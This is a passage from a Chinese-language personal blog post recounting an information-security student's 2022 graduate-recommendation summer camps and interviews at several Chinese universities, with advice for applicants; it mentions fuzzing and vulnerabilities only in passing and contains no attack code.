    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里记录着本人 2022 年秋季保研求学的经历。</p><p>考虑到各个院校的保密需求，这篇经验帖在推免生填报系统关闭后的一段时间发布。</p><span id="more"></span><h2 id="二、个人情况">二、个人情况</h2><ul><li><p><strong>学校：末流985</strong></p></li><li><p>专业：信息安全</p></li><li><p>GPA: 3.79/4.00</p></li><li><p><strong>排名：1/42</strong></p></li><li><p>奖项：一些校级和省级奖项，一个国三水奖；有国励，无国家奖学金。</p><blockquote><p>本专业每年只有一个国奖，年年国奖不是同一个人，年年国奖第二名都是我。本科永远的痛 T_T</p></blockquote></li><li><p>实习经历</p><ul><li>大二寒假：长沙本地静态分析研发</li><li>大二暑假：<strong>腾讯</strong>安全玄武实验室</li></ul></li><li><p>科研经历：大三年<strong>大半年</strong>的<strong>清华网研院实习</strong>。实习期间主要参与对比试验的进行、部分论文的撰写以及另一个项目的代码编写。</p></li><li><p>论文：清华实习期间混了篇 <strong>Usenix Security 2023</strong>（安全国际四大顶会之一） 在投论文 <strong>三作</strong>。</p></li><li><p>项目：<strong>无科研项目</strong>，有一个产出较多的 <strong>Fuzzer</strong>，挖掘到诸多知名厂商的漏洞，<strong>获得过漏洞致谢和较丰厚的漏洞赏金</strong>。</p></li><li><p>科研兴趣：软件与操作系统安全</p></li><li><p>目标：华五往上<strong>学硕</strong>。</p><blockquote><p>不考虑专硕，几万几万的学费掏不出来（本科每年 8k 学费都要死要活的，几 w 学费怕不是要砸锅卖铁）</p><p>不考虑直博，直博目前没有想法，不能为了冲院校而直博，这个得慎之又慎。</p></blockquote></li></ul><blockquote><p>粗体标注了一些个人认为略微可以算是重点的东西。</p></blockquote><p>最终去向：<strong>清华大学网络科学与网络空间研究院</strong>。</p><p><img src="/2022/11/baoyan-note/%5DTSY%25A%7BP0MFJSWU8JUJ6SU7.png" alt="img"></p><h2 id="三、夏令营">三、夏令营</h2><h3 id="1-整体情况">1. 整体情况</h3><table><thead><tr><th style="text-align:center">院系</th><th style="text-align:center">入营情况</th><th style="text-align:left">备注</th></tr></thead><tbody><tr><td style="text-align:center">北大计算机</td><td style="text-align:center">没入</td><td style="text-align:left">材料晚了一天提交，没交上（绝了）</td></tr><tr><td style="text-align:center">北大软微</td><td style="text-align:center"><strong>入营</strong></td><td style="text-align:left"></td></tr><tr><td style="text-align:center">北大信工</td><td style="text-align:center">没入</td><td style="text-align:left">可能要联系导师</td></tr><tr><td style="text-align:center">清华深圳研究院</td><td style="text-align:center">没入</td><td style="text-align:left">可能要联系导师</td></tr><tr><td style="text-align:center">清华网研院</td><td style="text-align:center">没入</td><td style="text-align:left">优先进直博，至于硕士可能是冲的人太多了，院校 title 不好被筛掉了</td></tr><tr><td style="text-align:center">复旦计算机</td><td style="text-align:center"><strong>入营</strong></td><td style="text-align:left">纯纯的只按照院校 title 和 rank 筛，入营送衣服和本子</td></tr><tr><td style="text-align:center">国防科大</td><td style="text-align:center">/</td><td style="text-align:left">报了就没再管了</td></tr><tr><td style="text-align:center">哈工深</td><td style="text-align:center">没入</td><td style="text-align:left">今年 bar 感觉格外的高</td></tr><tr><td style="text-align:center">华科计算机</td><td style="text-align:center">没入</td><td style="text-align:left">bar 高</td></tr><tr><td style="text-align:center">南大计院</td><td style="text-align:center"><strong>入营</strong></td><td style="text-align:left">听说 1k 人的大海营</td></tr><tr><td style="text-align:center">南大软院</td><td style="text-align:center">入营（放弃）</td><td style="text-align:left">时间和南大计院冲了</td></tr><tr><td style="text-align:center">人大信科</td><td style="text-align:center"><strong>入营</strong></td><td style="text-align:left">筛人不纯粹按照 title 和 rank，而是会结合自身经历等等来筛，非常的有意思。</td></tr><tr><td style="text-align:center">上交软院</td><td style="text-align:center"><strong>入营</strong></td><td style="text-align:left"></td></tr><tr><td style="text-align:center">武大网安</td><td style="text-align:center"><strong>入营</strong></td><td style="text-align:left"></td></tr><tr><td style="text-align:center">中科大网安</td><td style="text-align:center"><strong>入营</strong></td><td style="text-align:left">听说 985 bar 低稳进，入营送大礼包（但是后期鸽掉中科大夏令营则得为大礼包付费）</td></tr><tr><td style="text-align:center">中科院计算所</td><td style="text-align:center"><strong>入营</strong></td><td style="text-align:left">入了但退出面试</td></tr><tr><td style="text-align:center">中科院信工所</td><td style="text-align:center">半入营（放弃）</td><td style="text-align:left">入了但是感觉没筛人，而且学校放假材料要盖章，同时也入了一些不错的学校，就没再管了</td></tr></tbody></table><p>总结：</p><ul><li>华五的学校基本都入了（人大、南大、复旦、上交、中科大）</li><li>清北除了北大软微以外，都没让我入…</li></ul><blockquote><p>还是太菜了…</p></blockquote><h3 id="2-具体情况">2. 具体情况</h3><blockquote><p>整个夏令营高峰期差不多是两周左右，以下按面试时间排序。</p></blockquote><h4 id="a-复旦计算机">a. 复旦计算机</h4><h5 id="入营">入营</h5><p>复旦入营是纯纯的卡 title 和 rank，只要 title 好 rank 够就直接放你进去，实习经历科研经历论文啥的在入营阶段是一点也不看。</p><p>入营的营员都会发一件文化衫和一个复旦的本子，比较友好。</p><blockquote><p>不友好的是发的文化衫<strong>我穿不下</strong>（就不能先统计一下吗，捂脸）</p></blockquote><p>复旦今年入 300 人，但是可能只招收 50 个左右，最大头的招生部分还是留在了预推免。</p><h5 id="时间表">时间表</h5><ul><li>7.1 上午：复旦模拟面试</li><li>7.4 上午：复旦开幕式</li><li>7.5：上午复旦机试，下午复旦英语面试</li><li>7.6 上午：复旦专业面试</li></ul><blockquote><p>复旦大学的时间貌似一直都是这样摊的比较开，不过幸好它比较早开营，没怎么和其他学校撞上。</p></blockquote><h5 id="开幕式">开幕式</h5><p>复旦入营就会寄一件文化衫 + 本子。开幕式的时候要求全体营员身穿文化衫，一批一批集体合照，但问题是…</p><ul><li>复旦没有统计身高啥的，发的文化衫是面向 175 cm 的，对我一个快到 190 的壮汉属实是不太能套的进（捂脸）</li><li>腾讯会议对同时打开的摄像头数量貌似有限制，有不少同学在开幕式要打开摄像头合照的时候，被腾讯会议拦截摄像头打开请求，要求再等一段时间再打开…（包括我）</li><li>合影的时候，有好几个同学的腾讯会议背景还是清华网研院的图片（清华网研院比复旦早开幕，估计是网研院那边有要求要换背景），合影时属实有点尴尬（笑）</li></ul><h5 id="机试">机试</h5><p>复旦的机试一直都和其他学校不太一样，2小时3道题，自己编测试样例然后测试，提交时把自己写的题解（包括解题思路、时间复杂度、自己编写的测试样例等等）和代码打包交上去。提供的 OJ 只能反馈是否 Compile Error 或者 Submit，其他的都无法反馈。</p><p>第一题我用的图拓扑排序，第二题要用单调栈+线段树，第三题有点类似与背包问题，应该要用 DP。当时只做出来了第一题，第二题卡太久时间结果愣是没做出来。</p><h5 id="英语面试">英语面试</h5><p>英语面试的问题和<strong>自己的自我介绍高度相关</strong>，貌似英语面的时候那边没有考生的材料，有点奇怪。面试的时候是一个老师以及一个有点像是研究生的学姐在面，整个过程一直都是学姐提问，老师没问问题。</p><p>自我介绍里提了一句<strong>辅助完成论文的编写</strong>，后面的英语问答全部都是问这方面的（捂脸）。例如问了:</p><ul><li>写的论文哪部分</li><li>你是如何写的 Related work，可以分享一下经验吗</li><li>Fuzzing 的背景</li></ul><p>等等，答得也只能说一般般，先前准备的英语模板问题根本没用上。</p><h5 id="专业面试">专业面试</h5><p>专业面试是五个老师面，每个老师都会问问题。问的问题主要围绕我的腾讯实习经历、fuzzer 工具、408、机考题等等，总体还是<strong>围绕自我介绍</strong>。</p><blockquote><p>这里要插一句了，看上去面试的老师好像真的没有考生的相关材料，感觉有点奇怪。</p></blockquote><p>408 主要问的我操作系统缺页中断相关的内容，以及 http 和 https 的差别，还有 https 在什么情况下会被中间人攻击等。</p><p>机考题问了我第二题怎么做。机考题应该是必问项，有的同学会被问第三题有的会被问第二题，因此即便当时机考时做不出来也要事后立即求助他人去了解剩余不会做的题目的做法。</p><p>老师会专门问一下有没有<strong>科研项目</strong>，我那个 Fuzzer 不能算是科研，但是我也只能把它捞出来说了。边上有个老师提问这个工具挖到的漏洞有没有漏洞证明啥的，我说有，拿到了几个 CVE 编号和漏洞赏金。还问了一下这个是怎么检测到漏洞的，我就把 Address Sanitizer 搬出来简单扯了两句。</p><p>整体上答得还行。</p><h5 id="结果">结果</h5><p>寄了，连 waiting list 都没有呜呜。后来仔细想了一下应该有几种原因：</p><ol><li>竞争压力有点大。我报的是 ym 老师的智能系统组，学硕大概 15 进 2，而且这个组好像没有弄 waiting list。</li><li>没联系导师。不过这个可能性有点小，因为入营便立刻联系老师的学生同样有没进的。</li><li>方向不大对头。我本科阶段做的一直是和模糊测试有关，但他们那边主要做的还是软件代码分析这一块，模糊测试貌似不怎么做。</li></ol><p>仔细想想还是第三个原因可能性更大一点，因为面试的时候好像那些老师对我的内容不太感兴趣，一度出现了没什么老师想问问题的沉默尴尬局面。</p><h4 id="b-人大信院">b. 人大信院</h4><h5 id="入营-2">入营</h5><p>人大信院是最早开放夏令营报名的（5月20日截至），因此被冲烂了，报的人太多。先前说六月中旬出结果，结果六月中旬了之后还没出来，通知最上方的是一个叫做<strong>王老吉奖学金推荐情况公示</strong>的通知。因此很多绿群群友就戏称人大信院为王老吉。</p><p>这个王老吉公示的浏览量我是看着他从 200 变成现在的 8k+ 的，被冲烂了已经…</p><p><img src="/2022/11/baoyan-note/image-20220714161625917.png" alt="image-20220714161625917"></p><p>人大先前以为报的人太多，筛材料的时候会把自己筛掉，结果后来竟然入营了，真是意外之喜。看来人大应该是会综合材料来筛选，不是简单的 title + rank 筛法。</p><p>人大是一个小而精的学校，学校虽然不大但是地理位置真的就是在黄金地带（中关村），因此去人大确实非常的赚。（而且人大这几年计算机一直在高速发展）</p><h5 id="时间表-2">时间表</h5><p>7.3 下午人大信院专业面试。</p><p>人大还有笔试，可以用 CSP 抵。有笔试就有模拟环节，不过我用 CSP 抵掉了就省略了这两个环节，不然就和南大笔试冲突了。今年 CSP 300 抵的分数没有去年多，本来以为抵掉就亏了，不过貌似今年的笔试题比去年要难很多，实际上还是赚了。</p><h5 id="专业面试-2">专业面试</h5><p>人大考核受限于保密条例，不会在这里说明更多细节，只能说点自己的经历。（人大对面试题的保密性要求非常高，面试前强调一下，面试后又强调一下）</p><p>英语面是我面的最差的一次，磕磕绊绊几秒钟卡一下然后蹦出几个单词，主要还是有点紧张，就没答上来。这个环节可能是因为比较难，所以分数占比应该会稍微比较高（猜测）。</p><p>后面的面试就没啥了，比较顺利，老师也不会为难你。只要你完成回答后半秒内没有继续回答，老师就会直接切换到下一个问题，不会继续刁难，非常舒服。</p><h5 id="导师面">导师面</h5><p>面完后的那个晚上，面我的那个导师打电话联系我并简单的聊了聊相关的工作（声音很好听人也挺大牛的）。因为我本科阶段在模糊测试方面接触的比较多，老师也希望我能来人大。不过他也坦言导师在面试过程中的影响很有限，主要还是看自己。</p><h5 id="结果-2">结果</h5><p><strong>面试结束后的记录</strong>：</p><p>一个字，寄！可能还是英语面太拉跨了，同时竞争压力也有点大。原先信安是 25 进 2，结果笔试的时候筛掉了一部分，实际上参与面试的就只有 15 个左右。</p><p>只希望自己排在 waiting list 靠前的位置，这样应该能候补上。按照往年的情况，人大信安这块可以候补到第七左右。</p><p>人大结果出的很快，它是分的三天来面试，分别面直博、学硕和专硕。面完的第二天就会发邮件，例如在人大面专硕的那一天就能收到学硕的邮件（如果有）。</p><p><strong>后续</strong>：好家伙，还真给我发<strong>优营</strong>了，真是太感动了。今年信安优营有 3 个，真是让我感动的不行。</p><h4 id="c-北大软微">c. 北大软微</h4><h5 id="入营-3">入营</h5><p>北大软微今年貌似是第一次开夏令营，先前都只有预推免，因此很多人猜测软微这是要搞什么大动作。</p><p>首先是材料递交申请，软微会先筛掉一部分材料不合格的，之后让材料合格的同学<strong>选择一篇论文做一个文献阅读笔记</strong>，之后专家再来根据这个笔记筛选。等这个流程全部都通过后才算是入营，今年入营 212 人，只有一半能留下。</p><p>论文选择主要有五个方向，选的那个方向的论文读就是你最终选择的方向。五个方向分别是：</p><ul><li>系统软件（泛在操作系统、数联网系统软件等）</li><li>高可信软件（软件与系统安全、区块链与隐私计算等）</li><li>领域智能软件（大数据机器学习、分布式智能运维等）</li><li>领域智能软件（多模态知识计算、程序分析与理解等）</li><li>领域智能软件 (智能计算与感知等)</li></ul><p>下面三个方向不考虑。我本来是想选第二个方向的论文的，但是那个方向列出来的论文我看着难受，一半都是机器学习，剩下的有区块链什么的，因此我最终选择的是方向1中的一篇，将污点分析技术与大数据引擎结合来进行隐私保护的论文。</p><p>文献阅读笔记要求至少 1.5k 字，但是很多 2k 字的都没入营，入营的我简单统计了一下基本上都是 4k 字往上走（包括我）。</p><blockquote><p>个人感觉这不是卷，只是因为 2k 字实在太少了，不好描述论文讲的内容。</p></blockquote><h5 id="时间表-3">时间表</h5><ul><li>7.10 上午北大软微开营</li><li>7.10 下午北大软微课题组座谈会</li><li>7.11-7.12 北大软微面试</li></ul><h5 id="开营">开营</h5><p>之前的北大软微以就业为导向，去那边的基本上就是面向就业，因为可以放实习，很多同学过去后都可以实习一两年，非常舒服，甚至绿群里流传着《软微圣经》这样神奇的东西…</p><p>但是！从今年开始，一切都变了。今年面向推免生的软微，要<strong>面向科研方向</strong>招生。换句话说，今年招的专硕不再是<strong>普通工程硕士</strong>，而是<strong>前沿工程硕士</strong>，招专硕过去搞科研但<strong>没有论文指标</strong>，看的总感觉有点奇怪。</p><p>今年软微招生的老师有一半是来自于北大信工那边的老师，挺多老师的实验室设立在燕园（北大本部）。因此对于方向1来说（我只知道方向1），软微3年 = 大兴 1年 + 1.5年北大燕园科研 + 0.5 年实习。</p><p>燕园科研学校不会分配住宿（人家本部自己都住不下了怎么会分给别人…），因此软微等要去燕园做科研的话，学生要自己找房子租，不过院系补贴 2.5k + 老师实验室科研补贴应该可以涵盖燕园房租（房租大概3k+），因此实际上还算挺香的，就连北大信科也是在昌平那么偏远的地方。</p><p>非常罕见的是，今年软微院长说<strong>没有开预推免</strong>，软微会把入营的营员都放入 waiting list 中以防止鸽穿。</p><blockquote><p>不过这个看具体方向，有些方向的老师就说不准备 waiting list 了，鸽穿就鸽穿。</p><p>我寻思着应该是他们在信科也有招生名额，不缺软微这几个，所以很有底气。</p></blockquote><h5 id="专业面试-3">专业面试</h5><p>面试的话要准备一个自我介绍 PPT，像老师展示自己的实力。面试的 j 老师非常的和蔼，整体上面试非常的轻松愉快。</p><p>英语面试真就是走个过场，老师问我你还报了哪些学校的夏令营，我说我报了复旦的夏令营，但是被他们拒绝了；我还报了清华的夏令营，但是连营都没入（捂脸）。</p><p>但是！面试老师说，我的专业性太强了（因为我本科阶段主要还是搞的软件安全，并且出漏洞了），他们方向1这边主要还是做系统软件。j 老师挺想收我的，但是他是<strong>之前</strong>搞得安全，现在已经不搞了，因此把我推给了方向2的老师。</p><p>结果方向2老师没有打电话给我（导师会打电话发 offer 确认学生来不来的）。面试完的第二天晚上 j 老师给我打了个电话，以为方向2老师已经给我打电话了，结果没有，怪尴尬的（捂脸）。后来我又主动发邮件 + 找学长内推方向2的 s 老师，结果石沉大海，我估计软微要寄。</p><h5 id="结果-3">结果</h5><p>一直没收到方向2老师的电话，是真的寄了… 看着隔壁计科专业 rk1 rk2 分别上岸 pkucs 和 thusz，属实是羡慕极了。</p><p>优营名单出来的那一刻还是写了封邮件给 j 老师，希望后面要是有鸽子就考虑一下我。</p><p>可惜没拿到 pkuss 保底。</p><h5 id="题外话">题外话</h5><p>今年 pku 计算机和深圳研究院都是弱 com，只要有老师要你就可以上岸。可惜当时从哪里听说 pku cs 是强 com，所以就没联系导师，可惜。</p><p>虽然软微今年面向科研招生，但是实际上也有一些不怎么管学生的导师，跟着他们应该还是和之前一样能去实习。</p><h4 id="d-上交软院">d. 上交软院</h4><h5 id="入营-4">入营</h5><p>上交软院想冲一下 ipads 实验室，那边搞系统真的是非常的强，可以说是国内搞 OS 最强的实验室。x 老师学术能力非常强，而且和蔼，还帅（滑稽）。四月末的时候发了个邮件尝试联系他，收到了一个标准回复。</p><p>不过没想到的是他竟然真的翻看了我的博客，而且还因为我博客中记录了关于 uCore 课程的笔记（uCore 课程笔记我记的贼详细，可以说应该没有人在 uCore 上的笔记比我更详细了），于是就把我的博客推给了 uCore 作者之一——清华大学计算机系 chyyuu 老师，之后…</p><p><img src="/2022/11/baoyan-note/image-20220714165628686.png" alt="image-20220714165628686"></p><p>属实是把我感动到了呜呜。后来和 chyyuu 老师打了个电话唠嗑唠嗑，简单聊了聊这方面的内容，也为我增加了点夏令营的信心，挺感谢这两位老师的。</p><h5 id="时间表-4">时间表</h5><ul><li>7.9 交软演练</li><li>7.11 上午交软开营，下午交软机试</li><li>7.12 上午交软报告</li><li>7.13 交软专业面试</li></ul><h5 id="开营-2">开营</h5><p>开营那天上午，我赶着去自习室准备听开营，结果电动车出车祸了撞人了呜呜，那天上午便带着伤者去医院检查，开营完全没听。后来听绿群群友说，ipads 只招收推免生 5-7 个左右。虽然 2021 年招收了这些人：</p><p><img src="/2022/11/baoyan-note/image-20220714165910483.png" alt="image-20220714165910483"></p><p>但是实际上里面也有些考研、联合培养啥的，推免生招的确实很少，竞争压力非常激烈。</p><p>而且交软入营的人大概有100出头，一开始报 ipads  的就有 50+，可想而知这里面的竞争是有多激烈…</p><h5 id="机考">机考</h5><p>上交软院的机考出了名的具有特色，是种超大型模拟题（能做3小时的那种模拟题）。今年的模拟题主要是要手动实现机器学习中的决策树，不涉及图形界面，难度稍微降低了点。不过我的做题策略有点问题，我是先把代码写的差不多之后再来做测试，因此后面时间来不及测试完全部代码，只测试了一半的代码，不知道机考会怎么算分。</p><p>在机考前，交软会发放 VPN 账户和远程虚拟环境的访问账户和密码，要求我们自己去配置交软远程机器的环境（自己配置 IDE 等）。后面机考的代码编写全都要起一个远程桌面连接，在远程环境下完成，并且在远程桌面下录屏。</p><p>远程环境的配置：CPU 至强系列，内存 16 GB，磁盘空间 80 GB，也算够用，我装了 Visual Studio、VSCode、PyCharm 等，还拷贝 C++ 文档、Python 文档至远程环境上，后来发现只用上了 VS，文档啥的完全没用上。</p><p>但远程环境也有点问题：</p><ol><li>磁盘性能卡顿。磁盘是 HDD，因此稍微操作一下电脑，整个磁盘活动率就达到 100%，新建个 文件夹都会卡上好久（一定概率）。第一次用 VS 编译 hello world 时花了 10s … 不过后来还好，只要事先把 VS 开好，等一切都加载完成后就没什么大问题。</li><li>网络环境。网络环境的波动会极大的影响自己操作远程环境的舒适程度。听说有人在考试时因为远程环境卡成 PPT 愤然弃考…</li></ol><p>上交机考原定是 15:00 开始，但是由于一直都有同学无法连上远程 VPN，因此一直拖到了后面大概 16:30 才开始。那天下午机试正好和软微面试冲突了，原来是打算先面完软微后再来迟到的参与上交机考，但是那天真就非常巧合的遇上了 VPN 连接失败的事故，以至于面完软微后刚好可以参与上交机考。但同样非常巧合的是，那天软微是最后一个面我的（简直绝了…）。</p><p>我所在的那个云考场老师之前说得等所有人进了考场后才能发放题目，我面完软微后就紧急去问绿群群友他们的监考老师手机号，然后打电话找到了我所在的云考场会议号，接下来才开始机试，属实是感动到了。</p><p><strong>机考分数没到 60 将不能参加后续的面试</strong>。</p><h5 id="专业面试-4">专业面试</h5><p>ipads 的面试和往年一样，看论文然后到时候提问。面试流程大概是先用 PPT 介绍一下自己，然后中间提问论文最后英语面。</p><p>面试的老师非常的和蔼随和，但是问题是<strong>真的刁钻</strong>…</p><p>一开始我以为提问论文是考验你对论文的熟悉程度，于是考前读了两遍论文并且熟悉论文中的每一个点，就连评估那块的数据我都差点背下来了。但是老师提问的是对论文的<strong>科研开放思维</strong>，例如你觉得某某检查应该放到哪里来检查，硬件还是软件；某某东西在论文里是只能在一个 CPU 上做的，但我要是想让他在多个 CPU 上并行处理，你觉得该怎么做等等。其他人问到的问题我不太晓得，但是我问到的问题都是这种非常开放性的东西。</p><p>真的是完全答不上来…哑口无言属于是。主要是那些问题不是可以脱口而出的东西，需要花些时间理顺逻辑，不过在当时的情况下已经没法暂停思考了，只能想到什么说什么，已经白给了…</p><p>英语面的时候让我用英语介绍一个自己的项目，随便介绍一个，我就挑了先前混的那片论文简单讲了讲。</p><p>面的时候老师着重的问了我的代码能力，我说那个 Fuzzer 2w 行代码我写了大概 1.2w 行这样。</p><p>整体面试还是非常轻松愉快的，总时间卡死 20 分钟，答不上问题老师会引导。只能怪自己还是太菜了呜呜…安慰自己喜提 ipads 面试体验卡。</p><h5 id="结果-4">结果</h5><p>上交无论什么院的考核，结果都是八月底出，这个和其他学校不太一样。其他学校都是面试后的一周内甚至三天内出，上交就会慢一点。直博出的比直硕早，大概八月中旬前就会出，貌似比较水（看院系）。</p><p>不过无所谓了，反正面试比较惨，排名应该会很后面，面完已经开始摆烂了。</p><p>而且通常来讲，上交软院的名额会优先分配给已经进组实习的同学（猜测），因此对于外校生来说，想拿到学硕的可能性会更低。</p><p>以及，骑电动车要走绿道呜呜赔惨了。</p><blockquote><p>果然，后来发邮件给了个替补第六，约等于寄。</p></blockquote><h4 id="e-武大网安">e. 武大网安</h4><h5 id="入营-5">入营</h5><p>武大网安当初是随便报的一个，感觉自己可能大概率不会来这里，不过还是为了刷刷面试经验就报了这个。</p><h5 id="时间表-5">时间表</h5><p>7.11 下午 开营（没听，因为在进行软微面试和交软机考）</p><p>7.12 专业面试（我排到下午了）</p><p>7.13 上午闭营</p><h5 id="面试">面试</h5><p>武大网安的面试顺序是在群视频中直播抽签过程，整个过程非常快，我刚好轮到下午。</p><p>面试的时间非常短，一个人大概也就七八分钟，我是下午第6个，结果大概开始面试35分钟后就轮到我面了 … 当时我设备啥的还在调试，非常凑巧就赶上了。</p><p>武大网安面试的方式是最奇怪的一个，监考端用腾讯会议（没啥问题），但是面试端用 QQ 视频，这个就有点神奇了（捂脸）。</p><p>问的问题主要是围绕那片三作论文以及 Fuzzer 工具，应该是面向论文和项目提问。</p><p>问的时候问了我：**你有什么奖项吗？**这个属实是我的缺点… 回答：我在竞赛方面没有特别突出，只拿了一些校级和省级奖项（捂脸）。</p><h5 id="结果-5">结果</h5><p>优营，不过我放弃掉了，因为在出最终优营名单之前中科大 offer 下发了，所以想赶紧释放武大 offer 尽可能地把机会留给后面的同学。</p><h4 id="f-南大计算机">f. 南大计算机</h4><h5 id="时间表-6">时间表</h5><p>7.4 下午：南大模拟面试</p><p>7.7 下午：南大笔试</p><p>7.13-7.14 专业面试</p><h5 id="笔试">笔试</h5><p>南大今年貌似开了千人海营，因此要通过笔试筛掉一大半。笔试 1小时 81道题（单选多选题都有，纯选择题），多选题<strong>多选漏选错选均不得分</strong>，设计的考点包含数据结构、读代码模拟执行的结果、计网操作系统啥的，还有 linux 相关的题目。涉及的考点非常复杂，覆盖面非常广，不只 408，还有 Java lambda 表达式的字节码是什么表示等这种奇怪题目。</p><p>笔试很具有区分度，筛掉了一大半的人（听说是 2k 进 200，小道消息），感觉笔试就是筛选那些<strong>运气</strong>和基础不错的学生（捂脸）</p><h5 id="实验室面">实验室面</h5><p>南大要求在院系面试前自己选择参与众多实验室的面试，因此我选择了唯一一个搞漏洞挖掘的实验室——SecLab。</p><p>Seclab 的 m 老师也非常的强，在很多学校都做过学术报告（本人有幸在清华实习期间聆听过 m 老师的报告，很有意思）。</p><p>虽然在实验室面时没有见到 m 老师，但实验室面时那几位面我的同学也是非常的 nice，有一位博士生还是最强大脑选手（膜拜）。</p><p>最后面的都很开心，结果后续院系考核寄了，属实是无语住了…</p><h5 id="专业面试-5">专业面试</h5><p>运气好过了笔试，结果面试是真的硬核…网上找了一圈都没看到什么南大面试的面经，我是第二天面的，根据前一天绿群群佬的面试经历来看，南大会比较喜欢考离散数据结构。但是这两天被车祸事故折腾的要死要活的，一点都没准备，结果面试直接寄了… 属实是祸不单行（捂脸），只好安慰自己<strong>祸依福所依，福依祸所伏</strong>了…</p><p>面试流程大概是这样：</p><ul><li><p>面试不问项目不问经历不问科研不问自我介绍，就纯纯的问专业课。</p></li><li><p>进去之后，第一问，请你用<strong>英语</strong>，描述 Kruskal 算法解决了什么问题，算法过程是什么样的，开销是多少</p><blockquote><p>是不是很硬核，捂脸，答得巨烂。</p></blockquote></li><li><p>之后的问题都是中文。先问离散再问数据结构，最后问了个操作系统的题目以及一个开放题。</p><p>南大面试貌似非常注重离散数学，因此最好要多复习复习。（我就吃了这个亏）</p><p>开放题问的是在课外主要做什么？我：我做了一个项目 balabala… 感觉这个回答的非常差劲，我估计不是他们想要的那种回答。</p></li></ul><p>可以说南大的面试是我所有面试中，表现最差的（比人大面试表现还差）。虽然面试是彻彻底底的寄了，不过按照往年的面经来看，南大貌似会被鸽穿，感觉还是有戏，晚点再看看。</p><h5 id="结果-6">结果</h5><p>waiting list 80 左右。已经完全不抱希望了，毕竟寄的这么惨…</p><p>貌似南大进了夏令营之后就不能再参加预推免了，感觉更没戏了…</p><p>虽然听说往年南大被鸽穿到候补 80+ ，不过预推免的 waiting list 和夏令营的一起排，因此估计我的 waiting list 排序会更后面一点。</p><h4 id="g-中科大网安">g. 中科大网安</h4><h5 id="入营-6">入营</h5><p>入营即送大礼包：</p><p><img src="/2022/11/baoyan-note/8995B3A7F4C274967CB4BB3DAFBDD6FA.jpg" alt="img"></p><h5 id="专业面试-6">专业面试</h5><p>面试分为两轮，每轮每个人10分钟，需要做 PPT 展示。两轮中只有一轮会有英语问答环节，ppt展示和专业课抽题做答两轮都有。</p><h5 id="结果-7">结果</h5><p>优营。感觉中科大优营对于 985 院校学生来说很好拿。我们这第一届网安学院夏令营 136 进 100 个优营。</p><p>不过有了优营之后<strong>还需要立即联系老师</strong>，在推免系统填报前和老师双选，否则优营作废。</p><p>我个人的建议是最好在拿到<strong>优营之后</strong>联系老师，因为老师可能更愿意接触那些有优营资格的学生。</p><p>我先前联系了一位偏向密码学应用的老师，老师理解也愿意一直为我保留名额直到我冲完清北，所以其实我后面要鸽掉他还挺难受的，受到了自己道德上的谴责呜呜。</p><h4 id="h-中科院计算所">h. 中科院计算所</h4><h5 id="入营-7">入营</h5><p>某天中午吃饭的时候突然就接到了中科院计算所老师的电话，邀请我晚上和老师简单聊聊。</p><p>其实入营我还挺惊讶的，不过个人对中科院的所不是很感兴趣，因为科研氛围太过浓厚，我还是更想去一个多元化的大学，过个丰富的研究生生活（笑）。</p><p>有点尴尬的是当时中科院计算所的意向导师，我在填完之后就已经忘得一干二净，还是后面和导师简短 1 对 1 面试时才从腾讯会议名上想起来…（后来发现不只我一个人把意向老师忘了，笑）</p><h5 id="简短面试">简短面试</h5><p>被拉到微信群里后才知道原来面试的不只是我一个，平均每个人的面试时间是 10 分钟。</p><p>意向导师会让你先做个自我介绍（毕竟老师啥材料都没有，根本不知道你的优势是什么），因此自我介绍要好好答。</p><p>之后老师针对我的实习经历与科研经历进行了一些提问，例如这个工作做的是什么等等，都是一些比较好回答的问题。</p><p>最后老师问了我一句“你调试过 Linux 源代码没有”，我说有且调试过今年年初爆发的 Dirty Pipe 漏洞，老师就让我介绍了一下，在介绍过程中频频点头，最后点评了一句回答的挺清晰的。</p><p>基本上简短面试问的也不长，比较轻松愉快。不过意向导师说自己只有专硕名额，让我自己做抉择来考虑要不要参加他的面试考核。</p><h5 id="结果-8">结果</h5><p>在简短面试之后我就跑路了，因为自己还是更偏向于去<strong>大学</strong>深造，同时专硕也不太满足自己的预期。</p><h3 id="3-夏令营的一点总结与经验">3. 夏令营的一点总结与经验</h3><ul><li><p>在<strong>入营</strong>的时候，title 和 rank <strong>至关重要</strong>，尤其是对于那些筛人时暴力 title &amp; rank 筛的学校，这里点名复旦。之前在绿群里看到一个末流211 rk1 多篇论文 + 多个国奖的佬，没入复旦计算机。当时看到他的消息时感觉这个有点戏剧化…</p><p>虽然 title 是由高考成绩决定，已经无法改变，但是 rank 确实可以再挣扎挣扎，<strong>rank 会直接影响到你是否能够入营</strong>。</p></li><li><p>ACM 慎重。除非拿 ACM 金，否则最好不要放弃科研和 rank。ACM 确实也是有优势的，有些学校对 ACMer 非常的青睐，但个人认为在上面的投入不如其他方面的性价比高。不过 ACMer 确实会在导师面等获取额外的印象分，这个看个人情况。</p></li><li><p>rank 和 title 会对入营起到很大的影响，但是在面试和导师面中，rank 和 title 反而是最不重要的，重要的是 <strong>科研经历与产出 &gt; 项目经历 &gt;= 竞赛经历 &gt;= 大厂实习经历 &gt;&gt; rank</strong>。导师更看重你的科研能力而不是 rank。同时<strong>有些</strong>学校的院系面试都只是走个过场，真正决定你留不留的下来的还是看材料，因此这些东西还是非常重要的。纯 rank 选手必须在专业课上打下非常扎实的基础，否则科研比不过、项目没有、竞赛没有，那基本上就毫无亮点。如果想着以后保研，公司实习的事情就可以稍微放放，应该把更多的经历花在科研实习上。</p></li><li><p>如果想冲<strong>强组牛导</strong>，<strong>一定要提前去参与课题组实习</strong>，最少实习一学期起步。提前实习可以<strong>提早占坑提早内定</strong>，同时夏令营时也可以很舒服的通过。不要想着只用嘴皮子就能套几个牛导，人家早就有实习生直接进组实习了。</p><p>实习也是双方选择的一个过程，在实习的过程中导师可以确定是否要你，你也可以确定这个组的氛围如何，是不是自己想去的那样，和先前的想象是否存在点出入。</p><p>同理，报那种<strong>以实验室为单位进行考核</strong>的院校，没有提前联系导师会吃大亏，这种实验室会优先收实习生（例如上交 